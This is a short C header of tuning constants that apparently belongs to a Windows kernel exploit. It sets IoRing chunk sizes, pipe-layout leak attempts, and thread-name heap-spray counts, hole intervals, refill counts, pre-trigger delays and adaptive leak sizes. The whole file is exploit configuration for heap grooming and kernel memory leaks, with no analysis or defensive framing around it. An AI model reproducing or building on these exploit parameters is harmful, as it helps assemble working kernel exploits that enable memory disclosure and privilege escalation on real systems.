#pragma once

#define DEBUG

#define CHUNKSIZE 0x100
#define IORING_CHUNK_SIZE 0x130

#define MAX_TRIES_PER_LEAK 1000

#define PIPE_LAYOUT_CAPTURE_ATTEMPTS 24
#define PIPE_LAYOUT_IOSB_LEAKS_PER_ATTEMPT 12
#define PIPE_LAYOUT_PIPE_ATTEMPTS_PER_IOSB 24
#define PIPE_LAYOUT_PIPE_LEAKS_PER_ATTEMPT 6
#define PIPE_LAYOUT_PIPE_CREATE_INITIAL 512
#define PIPE_LAYOUT_PIPE_CREATE_STEP 512
#define PIPE_LAYOUT_PIPE_CREATE_MAX 6000

#define THREADNAME_MAX_LEAK (64 * 1024 * 1024)
#define THREADNAME_USE_STAGED_ALLOCATION 1
#define THREADNAME_SIMPLE_SPRAY_COUNT 3000
#define THREADNAME_SIMPLE_PRE_TRIGGER_SETTLE_MS 200
#define THREADNAME_PREFILL_SPRAY_COUNT 0
#define THREADNAME_FIRST_SPRAY_COUNT 5000
#define THREADNAME_HOLE_SPRAY_COUNT 5000
#define THREADNAME_REFILL_COUNT 2500
#define THREADNAME_HOLE_INTERVAL 4
#define THREADNAME_PRE_PRIME_SETTLE_MS 0
#define THREADNAME_PRE_TRIGGER_SETTLE_MS 500
#define THREADNAME_LEAK_QUERY_HEADROOM 0x100
#define THREADNAME_LEAK_RETURN_HEADROOM 0x200
#define THREADNAME_VERIFY_READS 2
#define THREADNAME_MAX_READS_PER_LEAK 0x10000

#define THREADNAME_NULL_READS_BEFORE_REFRESH 2
#define THREADNAME_USE_ADAPTIVE_LEAK_SIZE 1
#define THREADNAME_MAX_RELIABLE_LEAK_SIZE 0x800
#define THREADNAME_ADAPTIVE_LEAK_STEP 0x100
#define THREADNAME_MIN_LEAK_SIZE 0x400
